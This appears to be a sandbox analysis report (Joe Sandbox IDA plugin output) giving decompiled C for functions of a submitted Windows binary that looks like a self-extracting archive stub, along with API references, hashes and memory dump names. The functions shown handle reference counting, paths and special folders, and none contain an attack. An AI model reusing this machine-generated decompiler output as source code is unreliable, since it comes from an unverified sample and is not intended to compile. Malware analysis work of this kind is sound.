				 *(_t445 + 0x60) = _t341;
				if(_t428 != 0) {
					 *((intOrPtr*)( *_t428 + 4))(_t428);
				}
				 *((intOrPtr*)(_t445 + 0x24)) = 0;
				 *((intOrPtr*)(_t445 + 0x28)) = 0;
				 *(_t445 + 0x7f) =  *((intOrPtr*)(_t445 + 0x74)) == 0xffffffff;
				_t443 =  *(_t445 + 0x6c);
				if( *(_t445 + 0x7f) != 0) {
					 *((intOrPtr*)(_t445 + 0x74)) =  *((intOrPtr*)(_t443 + 0x6c));
				}
				if( *((intOrPtr*)(_t445 + 0x74)) != 0) {
					 *(_t445 + 0x1c) =  *(_t445 + 0x1c) | 0xffffffff;
					 *(_t445 + 0x18) = 0;
					_t429 = 0;
					__eflags = 0;
					while(1) {
						 *(_t445 + 0xc) = _t429;
						__eflags = _t429 -  *((intOrPtr*)(_t445 + 0x74));
						if(_t429 >=  *((intOrPtr*)(_t445 + 0x74))) {
							break;
						}
						__eflags =  *(_t445 + 0x7f);
						if( *(_t445 + 0x7f) == 0) {
							_t426 =  *( *((intOrPtr*)(_t445 + 0x70)) + _t429 * 4);
						} else {
							_t426 = _t429;
						}
						_t331 =  *( *((intOrPtr*)(_t443 + 0x12c)) + _t426 * 4);
						 *(_t445 + 0x6c) = _t331;
						__eflags = _t331 - 0xffffffff;
						if(_t331 == 0xffffffff) {
							L21:
							_t429 = _t429 + 1;
							continue;
						} else {
							__eflags = _t331 -  *(_t445 + 0x1c);
							if(_t331 !=  *(_t445 + 0x1c)) {
								L16:
								_t416 =  *( *((intOrPtr*)(_t443 + 0x128)) + _t331 * 4);
								 *(_t445 + 0x18) = _t416;
								L17:
								 *(_t445 + 0x38) = _t416;
								while(1) {
									__eflags =  *(_t445 + 0x38) - _t426;
									if( *(_t445 + 0x38) > _t426) {
										break;
									}
									 *((intOrPtr*)(_t445 + 0x24)) =  *((intOrPtr*)(_t445 + 0x24)) +  *((intOrPtr*)( *(_t445 + 0x38) * 0x18 +  *((intOrPtr*)(_t443 + 0x68))));
									asm("adc [ebp+0x28], eax");
									 *(_t445 + 0x38) =  *(_t445 + 0x38) + 1;
									_t341 =  *(_t445 + 0x60);
									_t331 =  *(_t445 + 0x6c);
								}
								_t416 = _t426 + 1;
								 *(_t445 + 0x18) = _t416;
								 *(_t445 + 0x1c) = _t331;
								_t429 =  *(_t445 + 0xc);
								goto L21;
							}
							__eflags = _t426 - _t416;
							if(_t426 >= _t416) {
								goto L17;
							}
							goto L16;
						}
					}
					_t244 =  *((intOrPtr*)( *_t341 + 0xc))(_t341,  *((intOrPtr*)(_t445 + 0x24)),  *((intOrPtr*)(_t445 + 0x28)));
					__eflags = _t244;
					if(_t244 == 0) {
						_push(0x38);
						L004191BC();
						__eflags = _t244;
						if(_t244 == 0) {
							_t342 = 0;
							__eflags = 0;
						} else {
							_t342 = E004132F1(_t244);
						}
						 *(_t445 + 0x2c) = _t342;
						 *(_t445 + 0x54) = _t342;
						__eflags = _t342;
						if(_t342 != 0) {
							 *((intOrPtr*)( *_t342 + 4))(_t342);
						}
						_t431 =  *(_t445 + 0x60);
						E00413217(_t342, _t431);
						E004140DA(_t445 - 0x7c, __eflags, 1);
						 *(_t445 + 0x5c) =  *(_t445 + 0x5c) & 0x00000000;
						_t248 =  *((intOrPtr*)( *_t431))(_t431, 0x41a500, _t445 + 0x5c, 0);
						_push(0x38);
						L004191BC();
						__eflags = _t248;
						if(_t248 == 0) {
							_t248 = 0;
							__eflags = 0;
						} else {
							 *_t248 = 0x41c250;
							 *((intOrPtr*)(_t248 + 4)) = 0;
							 *_t248 = 0x41c75c;
							 *((intOrPtr*)(_t248 + 8)) = 0;
							 *((short*)(_t248 + 0xc)) = 0x100;
							 *((intOrPtr*)(_t248 + 0x30)) = 0;
						}
						_t432 = _t248;
						 *(_t445 + 0x3c) = _t432;
						 *(_t445 + 0x50) = _t432;
						__eflags = _t432;
						if(_t432 != 0) {
							 *((intOrPtr*)( *_t432 + 4))(_t432);
						}
						 *((intOrPtr*)(_t432 + 0x2c)) = _t443 + 0x10;
						_t73 = _t432 + 0x30; // 0x30
						E004010F2(_t73,  *(_t445 + 0x60));
						__eflags =  *(_t445 + 0x78);
						 *((char*)(_t432 + 0xc)) = 0 |  *(_t445 + 0x78) != 0x00000000;
						__eflags =  *(_t443 + 0x158);
						_t80 =  *(_t443 + 0x158) != 0;
						__eflags = _t80;
						 *((char*)(_t432 + 0xd)) = 0 | _t80;
						 *(_t445 + 0x44) = 0;
						while(1) {
							_t433 =  *(_t445 + 0x50);
							_t343 = E0041320C(_t342);
							__eflags = _t343;
							if(_t343 != 0) {
								break;
							}
							_t253 =  *(_t445 + 0x44);
							__eflags = _t253 -  *((intOrPtr*)(_t445 + 0x74));
							if(_t253 <  *((intOrPtr*)(_t445 + 0x74))) {
								 *((intOrPtr*)(_t445 + 0x30)) = 0;
								 *((intOrPtr*)(_t445 + 0x34)) = 0;
								 *((intOrPtr*)(_t445 + 0x10)) = 0;
								 *((intOrPtr*)(_t445 + 0x14)) = 0;
								__eflags =  *(_t445 + 0x7f);
								if( *(_t445 + 0x7f) == 0) {
									_t434 =  *( *((intOrPtr*)(_t445 + 0x70)) + _t253 * 4);
								} else {
									_t434 = _t253;
								}
								_t344 =  *( *((intOrPtr*)(_t443 + 0x12c)) + _t434 * 4);
								 *(_t445 - 0x14) = _t344;
								 *(_t445 + 0x40) = 1;
								__eflags = _t344 - 0xffffffff;
								if(_t344 == 0xffffffff) {
									L70:
									asm("sbb ecx, ecx");
									_t257 = E00414DE3( *(_t445 + 0x3c), _t434,  !( ~( *(_t445 + 0x7f) & 0x000000ff)) &  *((intOrPtr*)(_t445 + 0x70)) +  *(_t445 + 0x44) * 0x00000004,  *(_t445 + 0x40));
									 *(_t445 + 0x44) =  *(_t445 + 0x44) +  *(_t445 + 0x40);
									__eflags = _t257;
									if(_t257 == 0) {
										_t259 =  *(_t445 + 0x3c);
										__eflags =  *(_t259 + 0x24);
										if( *(_t259 + 0x24) == 0) {
											L109:
											_t260 =  *(_t445 + 0x2c);
											 *((intOrPtr*)(_t260 + 0x28)) =  *((intOrPtr*)(_t260 + 0x28)) +  *((intOrPtr*)(_t445 + 0x30));
											asm("adc [eax+0x2c], ecx");
											 *((intOrPtr*)(_t260 + 0x20)) =  *((intOrPtr*)(_t260 + 0x20)) +  *((intOrPtr*)(_t445 + 0x10));
											asm("adc [eax+0x24], ecx");
											_t342 = _t260;
											continue;
										}
										 *(_t445 + 0x58) =  *(_t445 + 0x58) & 0x00000000;
										_t261 =  *(_t445 + 0x60);
										__eflags = _t261;
										if(_t261 != 0) {
											_t261 =  *((intOrPtr*)( *_t261))(_t261, 0x41a530, _t445 + 0x58);
										}
										 *(_t445 - 4) = 1;
										 *((char*)(_t445 + 0x7b)) = 0;
										 *((char*)(_t445 + 0x6f)) = 0;
										E00411B60(_t261, _t445);
										_t436 = E004142CC(_t445 - 0x7c, _t445 + 0x30, _t443, __eflags,  *((intOrPtr*)(_t443 + 0xc)),  *((intOrPtr*)(_t443 + 0x108)),  *((intOrPtr*)(_t443 + 0x10c)), _t443 + 0x10, _t344, _t445 + 0x30,  *(_t445 + 0x50),  *(_t445 + 0x54), 0,  *(_t445 + 0x58), _t445 + 0x7b, _t445 + 0x6f, _t445);
										__eflags = _t436 - 1;
										if(_t436 == 1) {
											L87:
											_t376 =  *(_t445 + 0x3c);
											__eflags =  *(_t376 + 0x24);
											 *((char*)(_t445 + 0x4f)) =  *(_t376 + 0x24) == 0;
											__eflags = _t436 - 1;
											_t209 = (0 | _t436 == 0x00000001) + 1; // 0x1
											_t437 = _t209;
											_t267 = E00414D71(_t376, _t437);
											 *(_t445 + 0x40) = _t267;
											__eflags = _t267;
											if(_t267 == 0) {
												__eflags =  *((char*)(_t445 + 0x4f));
												if( *((char*)(_t445 + 0x4f)) == 0) {
													L105:
													_push( *_t445);
													L004191B0();
													_t268 =  *(_t445 + 0x58);
													goto L106;
												}
												_t270 =  *(_t445 + 0x5c);
												__eflags = _t270;
												if(_t270 == 0) {
													goto L105;
												}
												_t436 =  *((intOrPtr*)( *_t270 + 0x14))(_t270, 2, _t344, _t437);
												__eflags = _t436;
												if(_t436 == 0) {
													goto L105;
												}
												goto L102;
											}
											_push( *_t445);
											L004191B0();
											_t284 =  *(_t445 + 0x58);
											__eflags = _t284;
											if(_t284 != 0) {
												 *((intOrPtr*)( *_t284 + 8))(_t284);
											}
											_t285 =  *(_t445 + 0x50);
											__eflags = _t285;
											if(_t285 != 0) {
												 *((intOrPtr*)( *_t285 + 8))(_t285);
											}
											_t286 =  *(_t445 + 0x5c);
											__eflags = _t286;
											if(_t286 != 0) {
												 *((intOrPtr*)( *_t286 + 8))(_t286);
											}
											E00414DA0(_t445 - 0x7c);
											_t288 =  *(_t445 + 0x54);
											__eflags = _t288;
											if(_t288 != 0) {
												 *((intOrPtr*)( *_t288 + 8))(_t288);
											}
											_t289 =  *(_t445 + 0x60);
											__eflags = _t289;
											if(_t289 != 0) {
												 *((intOrPtr*)( *_t289 + 8))(_t289);
											}
											_t278 =  *(_t445 + 0x40);
											goto L110;
										} else {
											__eflags = _t436 - 0x80004001;
											if(_t436 == 0x80004001) {
												goto L87;
											}
											__eflags = _t436;
											if(_t436 != 0) {
												L102:
												_push( *_t445);
												L004191B0();
												_t272 =  *(_t445 + 0x58);
												L103:
												__eflags = _t272;
												if(_t272 != 0) {
													 *((intOrPtr*)( *_t272 + 8))(_t272);
												}
												goto L71;
											}
											_t436 = E00414D71( *(_t445 + 0x3c), 2);
											_push( *_t445);
											L004191B0();
											_t268 =  *(_t445 + 0x58);
											__eflags = _t436;
											if(_t436 == 0) {
												L106:
												__eflags = _t268;
												if(_t268 != 0) {
													 *((intOrPtr*)( *_t268 + 8))(_t268);
												}
												_t230 = _t445 - 4;
												 *_t230 =  *(_t445 - 4) & 0x00000000;
												__eflags =  *_t230;
												goto L109;
											}
											goto L103;
										}
									}
									L71:
									_t273 =  *(_t445 + 0x50);
									__eflags = _t273;
									if(_t273 != 0) {
										 *((intOrPtr*)( *_t273 + 8))(_t273);
									}
									_t274 =  *(_t445 + 0x5c);
									__eflags = _t274;
									if(_t274 != 0) {
										 *((intOrPtr*)( *_t274 + 8))(_t274);
									}
									E00414DA0(_t445 - 0x7c);
									_t276 =  *(_t445 + 0x54);
									__eflags = _t276;
									if(_t276 != 0) {
										 *((intOrPtr*)( *_t276 + 8))(_t276);
									}
									_t277 =  *(_t445 + 0x60);
									__eflags = _t277;
									if(_t277 != 0) {
										 *((intOrPtr*)( *_t277 + 8))(_t277);
									}
									L24:
									_t278 = _t436;
									goto L110;
								} else {
									_t296 =  *((intOrPtr*)(_t443 + 0x18));
									_t398 =  *((intOrPtr*)(_t443 + 0x40));
									_t423 =  *(_t398 + 4 + _t344 * 4);
									 *((intOrPtr*)(_t445 + 0x10)) =  *((intOrPtr*)(_t296 + _t423 * 8)) -  *((intOrPtr*)(_t296 +  *(_t398 + _t344 * 4) * 8));
									asm("sbb edx, [eax+ecx*8+0x4]");
									 *((intOrPtr*)(_t445 + 0x14)) =  *((intOrPtr*)(_t296 + 4 + _t423 * 8));
									_t439 = _t434 + 1;
									__eflags = _t439;
									 *(_t445 + 0x20) = _t439;
									_t344 =  *(_t445 - 0x14);
									_t434 =  *( *((intOrPtr*)(_t443 + 0x128)) + _t344 * 4);
									_t298 =  *(_t445 + 0x44);
									while(1) {
										_t298 = _t298 + 1;
										 *(_t445 + 0x48) = _t298;
										__eflags = _t298 -  *((intOrPtr*)(_t445 + 0x74));
										if(_t298 >=  *((intOrPtr*)(_t445 + 0x74))) {
											break;
										}
										__eflags =  *(_t445 + 0x7f);
										if( *(_t445 + 0x7f) == 0) {
											_t404 =  *( *((intOrPtr*)(_t445 + 0x70)) + _t298 * 4);
										} else {
											_t404 = _t298;
										}
										_t425 =  *((intOrPtr*)(_t443 + 0x12c));
										__eflags =  *((intOrPtr*)(_t425 + _t404 * 4)) - _t344;
										if( *((intOrPtr*)(_t425 + _t404 * 4)) != _t344) {
											break;
										} else {
											__eflags = _t404 -  *(_t445 + 0x20);
											if(_t404 <  *(_t445 + 0x20)) {
												break;
											}
											 *(_t445 + 0x20) = _t404 + 1;
											continue;
										}
									}
									_t299 = _t298 -  *(_t445 + 0x44);
									__eflags = _t299;
									 *(_t445 + 0x40) = _t299;
									 *(_t445 + 0x48) = _t434;
									while(1) {
										__eflags =  *(_t445 + 0x48) -  *(_t445 + 0x20);
										if( *(_t445 + 0x48) >=  *(_t445 + 0x20)) {
											goto L70;
										}
										 *((intOrPtr*)(_t445 + 0x30)) =  *((intOrPtr*)(_t445 + 0x30)) +  *((intOrPtr*)( *(_t445 + 0x48) * 0x18 +  *((intOrPtr*)(_t443 + 0x68))));
										asm("adc [ebp+0x34], eax");
										 *(_t445 + 0x48) =  *(_t445 + 0x48) + 1;
									}
									goto L70;
								}
							}
							__eflags = _t433;
							if(_t433 != 0) {
								 *((intOrPtr*)( *_t433 + 8))(_t433);
							}
							_t304 =  *(_t445 + 0x5c);
							__eflags = _t304;
							if(_t304 != 0) {
								 *((intOrPtr*)( *_t304 + 8))(_t304);
							}
							E00414DA0(_t445 - 0x7c);
							_t306 =  *(_t445 + 0x54);
							__eflags = _t306;
							if(_t306 != 0) {
								 *((intOrPtr*)( *_t306 + 8))(_t306);
							}
							_t307 =  *(_t445 + 0x60);
							__eflags = _t307;
							if(_t307 != 0) {
								 *((intOrPtr*)( *_t307 + 8))(_t307);
							}
							goto L7;
						}
						__eflags = _t433;
						if(_t433 != 0) {
							 *((intOrPtr*)( *_t433 + 8))(_t433);
						}
						_t313 =  *(_t445 + 0x5c);
						__eflags = _t313;
						if(_t313 != 0) {
							 *((intOrPtr*)( *_t313 + 8))(_t313);
						}
						E00414DA0(_t445 - 0x7c);
						_t315 =  *(_t445 + 0x54);
						__eflags = _t315;
						if(_t315 != 0) {
							 *((intOrPtr*)( *_t315 + 8))(_t315);
						}
						_t316 =  *(_t445 + 0x60);
						__eflags = _t316;
						if(_t316 != 0) {
							 *((intOrPtr*)( *_t316 + 8))(_t316);
						}
						_t278 = _t343;
						goto L110;
					}
					 *((intOrPtr*)( *_t341 + 8))(_t341);
					goto L24;
				} else {
					if(_t428 != 0) {
						 *((intOrPtr*)( *_t428 + 8))(_t428);
					}
					L7:
					_t278 = 0;
					L110:
					 *[fs:0x0] =  *((intOrPtr*)(_t445 - 0xc));
					return _t278;
				}
			}

0x00414e11
0x00414e1c
0x00414e21
0x00414e24
0x00414e27
0x00414e29
0x00414e2e
0x00414e33
0x00414e33
0x00414e36
0x00414e39
0x00414e40
0x00414e44
0x00414e4b
0x00414e50
0x00414e50
0x00414e58
0x00414e6b
0x00414e6f
0x00414e72
0x00414e72
0x00414e74
0x00414e74
0x00414e77
0x00414e7a
0x00000000
0x00000000
0x00414e7c
0x00414e80
0x00414e89
0x00414e82
0x00414e82
0x00414e82
0x00414e92
0x00414e95
0x00414e98
0x00414e9b
0x00414ee7
0x00414ee7
0x00000000
0x00414e9d
0x00414e9d
0x00414ea0
0x00414ea6
0x00414eac
0x00414eaf
0x00414eb2
0x00414eb2
0x00414eb5
0x00414eb5
0x00414eb8
0x00000000
0x00000000
0x00414ec6
0x00414ecd
0x00414ed0
0x00414ed3
0x00414ed6
0x00414ed6
0x00414edb
0x00414ede
0x00414ee1
0x00414ee4
0x00000000
0x00414ee4
0x00414ea2
0x00414ea4
0x00000000
0x00000000
0x00000000
0x00414ea4
0x00414e9b
0x00414ef3
0x00414ef8
0x00414efa
0x00414f09
0x00414f0b
0x00414f11
0x00414f13
0x00414f20
0x00414f20
0x00414f15
0x00414f1c
0x00414f1c
0x00414f22
0x00414f25
0x00414f28
0x00414f2a
0x00414f2f
0x00414f2f
0x00414f34
0x00414f3a
0x00414f44
0x00414f49
0x00414f59
0x00414f5b
0x00414f5d
0x00414f65
0x00414f67
0x00414f86
0x00414f86
0x00414f69
0x00414f69
0x00414f6f
0x00414f72
0x00414f78
0x00414f7b
0x00414f81
0x00414f81
0x00414f88
0x00414f8a
0x00414f8d
0x00414f90
0x00414f92
0x00414f97
0x00414f97
0x00414f9d
0x00414fa3
0x00414fa6
0x00414faf
0x00414fb5
0x00414fba
0x00414fc0
0x00414fc0
0x00414fc3
0x00414fc6
0x00414fc9
0x00414fc9
0x00414fd3
0x00414fd5
0x00414fd7
0x00000000
0x00000000
0x00415019
0x0041501c
0x0041501f
0x00415065
0x00415068
0x0041506b
0x0041506e
0x00415071
0x00415074
0x0041507d
0x00415076
0x00415076
0x00415076
0x00415086
0x00415089
0x0041508c
0x00415093
0x00415096
0x0041512e
0x00415140
0x0041514b
0x00415155
0x00415158
0x0041515a
0x004151a1
0x004151a4
0x004151a8
0x00415322
0x00415325
0x00415328
0x0041532e
0x00415334
0x0041533a
0x0041533d
0x00000000
0x0041533d
0x004151ae
0x004151b2
0x004151b5
0x004151b7
0x004151c5
0x004151c5
0x004151c7
0x004151cb
0x004151cf
0x004151d6
0x00415213
0x00415215
0x00415218
0x0041524f
0x0041524f
0x00415252
0x00415256
0x0041525c
0x00415262
0x00415262
0x00415266
0x0041526b
0x0041526e
0x00415270
0x004152cc
0x004152d0
0x00415308
0x00415308
0x0041530b
0x00415311
0x00000000
0x00415311
0x004152d2
0x004152d5
0x004152d7
0x00000000
0x00000000
0x004152e3
0x004152e5
0x004152e7
0x00000000
0x00000000
0x00000000
0x004152e7
0x00415272
0x00415275
0x0041527b
0x0041527e
0x00415280
0x00415285
0x00415285
0x00415288
0x0041528b
0x0041528d
0x00415292
0x00415292
0x00415295
0x00415298
0x0041529a
0x0041529f
0x0041529f
0x004152a5
0x004152aa
0x004152ad
0x004152af
0x004152b4
0x004152b4
0x004152b7
0x004152ba
0x004152bc
0x004152c1
0x004152c1
0x004152c4
0x00000000
0x0041521a
0x0041521a
0x00415220
0x00000000
0x00000000
0x00415222
0x00415224
0x004152e9
0x004152e9
0x004152ec
0x004152f1
0x004152f5
0x004152f5
0x004152f7
0x00415300
0x00415300
0x00000000
0x004152f7
0x00415234
0x00415236
0x00415239
0x0041523f
0x00415242
0x00415244
0x00415314
0x00415314
0x00415316
0x0041531b
0x0041531b
0x0041531e
0x0041531e
0x0041531e
0x00000000
0x0041531e
0x00000000
0x0041524a
0x00415218
0x0041515c
0x0041515c
0x0041515f
0x00415161
0x00415166
0x00415166
0x00415169
0x0041516c
0x0041516e
0x00415173
0x00415173
0x00415179
0x0041517e
0x00415181
0x00415183
0x00415188
0x00415188
0x0041518b
0x0041518e
0x00415190
0x00415199
0x00415199
0x00414f02
0x00414f02
0x00000000
0x0041509c
0x0041509c
0x0041509f
0x004150a2
0x004150af
0x004150b6
0x004150ba
0x004150bd
0x004150bd
0x004150be
0x004150c7
0x004150ca
0x004150cd
0x004150d0
0x004150d0
0x004150d1
0x004150d4
0x004150d7
0x00000000
0x00000000
0x004150d9
0x004150dd
0x004150e6
0x004150df
0x004150df
0x004150df
0x004150e9
0x004150ef
0x004150f2
0x00000000
0x004150f4
0x004150f4
0x004150f7
0x00000000
0x00000000
0x004150fa
0x00000000
0x004150fa
0x004150f2
0x004150ff
0x004150ff
0x00415102
0x00415105
0x00415108
0x0041510b
0x0041510e
0x00000000
0x00000000
0x0041511c
0x00415126
0x00415129
0x00415129
0x00000000
0x00415108
0x00415096
0x00415021
0x00415023
0x00415028
0x00415028
0x0041502b
0x0041502e
0x00415030
0x00415035
0x00415035
0x0041503b
0x00415040
0x00415043
0x00415045
0x0041504a
0x0041504a
0x0041504d
0x00415050
0x00415052
0x0041505b
0x0041505b
0x00000000
0x00415052
0x00414fd9
0x00414fdb
0x00414fe0
0x00414fe0
0x00414fe3
0x00414fe6
0x00414fe8
0x00414fed
0x00414fed
0x00414ff3
0x00414ff8
0x00414ffb
0x00414ffd
0x00415002
0x00415002
0x00415005
0x00415008
0x0041500a
0x0041500f
0x0041500f
0x00415012
0x00000000
0x00415012
0x00414eff
0x00000000
0x00414e5a
0x00414e5c
0x00414e61
0x00414e61
0x00414e64
0x00414e64
0x00415420
0x00415423
0x00415431
0x00415431

APIs

_EH_prolog.MSVCRT ref: 00414E11
??2@YAPAXI@Z.MSVCRT ref: 00414F0B
??2@YAPAXI@Z.MSVCRT ref: 00414F5D
??3@YAXPAX@Z.MSVCRT ref: 00415239
??3@YAXPAX@Z.MSVCRT ref: 00415275
??3@YAXPAX@Z.MSVCRT ref: 004152EC
??3@YAXPAX@Z.MSVCRT ref: 0041530B

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@$H_prolog
String ID:
API String ID: 417953191-0
Opcode ID: ba586416a0bba452b6734778f074693c00249af36b8f3a9ed5d69997b20310b1
Instruction ID: e5ac9cdd0bbed24d41e0b9fd9aa7c31187e14acbe242ba4463aa1c93b9762be3
Opcode Fuzzy Hash: ba586416a0bba452b6734778f074693c00249af36b8f3a9ed5d69997b20310b1
Instruction Fuzzy Hash: 64123B75600649DFCB14DF68C894AEA7BB5BF89304F24416EF81A8B351DB39EC81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00404772, Relevance: 10.6, APIs: 7, Instructions: 133
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E00404772(WCHAR* __ecx, struct _FILETIME* __edx) {
				signed int _v8;
				WCHAR* _v12;
				struct _FILETIME _v20;
				char _v32;
				signed int _t38;
				signed int _t41;
				signed int _t44;
				signed short _t48;
				signed char _t52;
				signed int _t60;
				signed int* _t66;
				void* _t67;
				WCHAR* _t78;
				signed int _t79;
				void* _t81;
				void* _t82;

				_t77 = __edx;
				_t66 = __ecx;
				_v12 = __ecx;
				_t38 = lstrlenW(__ecx);
				_t79 = _t38;
				_v8 = _t38;
				E00411B84( &_v32, _t66);
				_t78 = E004042F3( &_v32, _t77, 0);
				_t41 =  *(_t66 + _t79 * 2 - 2) & 0x0000ffff;
				if(_t41 == 0x5c || _t41 == 0x2f) {
					 *((short*)(_t78 + _t79 * 2 - 2)) = 0;
					_t79 = _t79 - 1;
					_v8 = _t79;
				}
				while(E0040317A(_t78) == 0) {
					while(_t79 > 0) {
						_t44 = _t78[_t79] & 0x0000ffff;
						if(_t44 == 0x2f || _t44 == 0x5c) {
							break;
						} else {
							_t79 = _t79 - 1;
							continue;
						}
					}
					if(_t79 == 0) {
						if(_v8 != 2) {
							L30:
							E0040976C(_t77, 1, 0xc, _t66);
							_push(_v32);
							L004191B0();
							return 0;
						}
						_t48 =  *_t66 | 0x00000020;
						if(_t48 < 0x61 || _t48 > 0x7a || _t66[0] != 0x3a) {
							goto L30;
						} else {
							_t81 = 1;
							L29:
							_push(_v32);
							L004191B0();
							return _t81;
						}
					}
					_t78[_t79] = 0;
				}
				GetSystemTimeAsFileTime( &_v20);
				_t52 = GetFileAttributesW(_t78); // executed
				if((_t52 & 0x00000010) != 0) {
					L13:
					while(E0040317A(_t78) != 0) {
						if(_t79 < _v8) {
							_t67 =  &(_t78[_t79]);
							memcpy(_t67, _v12 + _t79 * 2, _v8 - _t79 + 1);
							_t82 = _t82 + 0xc;
							if( *_t67 == 0) {
								L20:
								if(_t78[_t79] != 0) {
									_t60 = _t78[_t79] & 0x0000ffff;
									if(_t60 == 0x5c || _t60 == 0x2f) {
										goto L21;
									} else {
										L19:
										_t79 = _t79 + 1;
										goto L20;
									}
								}
								L21:
								_t78[_t79] = 0;
								continue;
							}
							goto L19;
						}
						_push(_v32);
						L004191B0();
						return 1;
					}
					E0040976C(_t77, 1, 0xc, _t78);
					L12:
					_t81 = 0;
					goto L29;
				}
				_t77 =  &_v20;
				if(E004044EA(_t78,  &_v20) == 0) {
					goto L13;
				}
				goto L12;
			}

0x00404772
0x0040477a
0x0040477e
0x00404781
0x0040478b
0x0040478d
0x00404790
0x0040479f
0x004047a1
0x004047a9
0x004047b2
0x004047b7
0x004047b8
0x004047b8
0x004047de
0x004047cc
0x004047bd
0x004047c4
0x00000000
0x004047cb
0x004047cb
0x00000000
0x004047cb
0x004047c4
0x004047d2
0x00404884
0x004048b0
0x004048b5
0x004048ba
0x004048bd
0x00000000
0x004048c5
0x00404889
0x00404891
0x00000000
0x004048a0
0x004048a2
0x004048a3
0x004048a3
0x004048a6
0x00000000
0x004048ac
0x00404891
0x004047da
0x004047da
0x004047ed
0x004047f4
0x004047fc
0x00000000
0x00404813
0x00404870
0x0040483b
0x0040483f
0x00404846
0x0040484c
0x0040485f
0x00404863
0x00404850
0x00404857
0x00000000
0x0040485e
0x0040485e
0x0040485e
0x00000000
0x0040485e
0x00404857
0x00404865
0x00404867
0x00000000
0x00404867
0x00000000
0x0040484e
0x00404872
0x00404875
0x00000000
0x0040487d
0x00404823
0x0040480c
0x0040480c
0x00000000
0x0040480c
0x004047fe
0x0040480a
0x00000000
0x00000000
0x00000000

APIs

lstrlenW.KERNEL32(?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 00404781

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT ref: 0040432C

GetSystemTimeAsFileTime.KERNEL32(00402DFC,00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047ED
GetFileAttributesW.KERNELBASE(00000000,?,?,0041E89C,0041E7B8,00000000,?,?,?,00402DFC,PreExtract,0041AA3C,0041E868), ref: 004047F4
memcpy.MSVCRT ref: 0040483F
??3@YAXPAX@Z.MSVCRT ref: 00404875
??3@YAXPAX@Z.MSVCRT ref: 004048A6
??3@YAXPAX@Z.MSVCRT ref: 004048BD

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$FileTimememcpy$AttributesSystemlstrlenwcsncpy
String ID:
API String ID: 1217483450-0
Opcode ID: 1e97e58eb6694b33401a4d19598d6c22e3153a2db632e24c5b261b99930c6615
Instruction ID: 89c85a9677983eca3fd09eb0c7f4f9a8a3de002ff802481e92c4df94bfbc2cfd
Opcode Fuzzy Hash: 1e97e58eb6694b33401a4d19598d6c22e3153a2db632e24c5b261b99930c6615
Instruction Fuzzy Hash: F5411ABA900151EADB207BA59841ABF76B4EF85704F548837EA02F32C1E73C8D4283DD

Uniqueness

Uniqueness Score: -1.00%

Function 00405502, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 80
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00405502(void* __edx) {
				short _v96;
				char _v620;
				intOrPtr _t11;
				intOrPtr _t12;
				intOrPtr _t13;
				intOrPtr _t14;
				intOrPtr _t15;
				intOrPtr _t16;
				char* _t18;
				WCHAR* _t22;
				WCHAR* _t23;
				WCHAR* _t24;
				WCHAR* _t25;
				WCHAR* _t26;
				WCHAR* _t27;
				WCHAR* _t28;
				void* _t34;
				void* _t35;
				void* _t36;

				 *0x41e75c = LoadLibraryA("kernel32");
				__imp__#17();
				E00403D6D(E00418D50());
				_t22 = 3;
				_t11 = E00403DC8(_t22);
				_t23 = 0x28;
				 *0x41e760 = _t11;
				_t12 = E00403DC8(_t23);
				_t24 = 2;
				 *0x41e74c = _t12;
				_t13 = E00403DC8(_t24);
				_t25 = 5;
				 *0x41e738 = _t13;
				_t14 = E00403DC8(_t25);
				_t26 = 0x15;
				 *0x41e73c = _t14;
				_t15 = E00403DC8(_t26);
				_t27 = 0x16;
				 *0x41e754 = _t15;
				_t16 = E00403DC8(_t27);
				_t28 = 0x17;
				 *0x41e748 = _t16;
				 *0x41e744 = E00403DC8(_t28);
				 *0x41e758 = 0;
				 *0x41e750 = 0;
				_t34 = 0;
				do {
					_t18 =  &_v620;
					__imp__SHGetSpecialFolderPathW(0, _t18, _t34, 0); // executed
					_t38 = _t18;
					if(_t18 != 0) {
						wsprintfW( &_v96, L"SfxFolder%02d", _t34);
						_t36 = _t36 + 0xc;
						_t18 = E00405051( &_v96,  &_v620, _t38, 1); // executed
						_t35 = 0;
						do {
							_t40 =  *((intOrPtr*)(_t35 + 0x41e45c)) - _t34;
							if( *((intOrPtr*)(_t35 + 0x41e45c)) == _t34) {
								_t6 = _t35 + 0x41e460; // 0x41ba7c
								_t18 = E00405051( *_t6,  &_v620, _t40, 0);
							}
							_t35 = _t35 + 8;
						} while (_t35 < 0x28);
					}
					_t34 = _t34 + 1;
				} while (_t34 < 0x40);
				return _t18;
			}

0x00405519
0x0040551e
0x00405529
0x00405530
0x00405531
0x00405538
0x00405539
0x0040553e
0x00405545
0x00405546
0x0040554b
0x00405552
0x00405553
0x00405558
0x0040555f
0x00405560
